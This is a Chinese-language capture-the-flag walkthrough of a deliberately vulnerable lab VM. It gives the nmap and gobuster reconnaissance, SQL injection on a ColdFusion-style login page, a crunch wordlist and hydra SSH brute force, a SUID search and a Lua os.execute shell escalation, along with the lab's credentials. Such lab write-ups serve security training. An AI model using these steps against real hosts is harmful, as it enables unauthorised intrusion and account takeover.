环境准备
靶机链接:百度网盘 请输入提取码
提取码:mqpj
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2022.3
信息收集
1.探测靶机ip
2.扫描靶机开放端口和服务情况
nmap -p- -A -sV 10.10.10.131
3.用gobuster进行扫目录
gobuster dir -u http://10.10.10.131 -w /usr/share/wordlists/dirb/big.txt -t 50
漏洞利用
1.访问/website 网址
2.查看源码,发现一个cms
3.谷歌这个cms的登录界面
4.查到一个关于渗透测试的介绍
/CFIDE/componentutils/
5.访问/CFIDE看到有一个Administrator路径
6.用gobuster扫描目录,扫出login.php目录
gobuster dir -u http://10.10.10.131/CFIDE/Administrator -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
7.尝试SQL注入
http://10.10.10.131//CFIDE/Administrator/login.php
8.确实存在sql注入漏洞
9.由于是POST类型的,需要抓包进行写入一个clover.txt文档里进行sqlmap探测
10.探测失败
sqlmap -r clover.txt --dbs
11.用自己的注入方法去得知密码为asta$$123
权限提升
1.成功登录ssh
ssh asta@10.10.10.131
2.只能自己一步步的找线索,在/var/backups/下的reminder里有提示
3.这里说sword用户知道前几位,后面四位的数字忘记了,用crunch制作字典来爆破
crunch 12 12 0123456789 -t 'P4SsW0rD@@@@' > pass.txt
4.用hydra进行爆破出密码P4SsW0rD4286
hydra -l sword -P pass.txt 10.10.10.131 ssh -t 30 -f -vV
5.ssh成功登录sword用户,用find命令查找suid权限的文件,查到一个.sh文件
ssh sword@10.10.10.131
find / -perm -u=s -type f 2>/dev/null
6.执行后发现Lua 5.2.3 在提权网站找到提权命令
os.execute("/bin/sh")
7.成功拿下!!!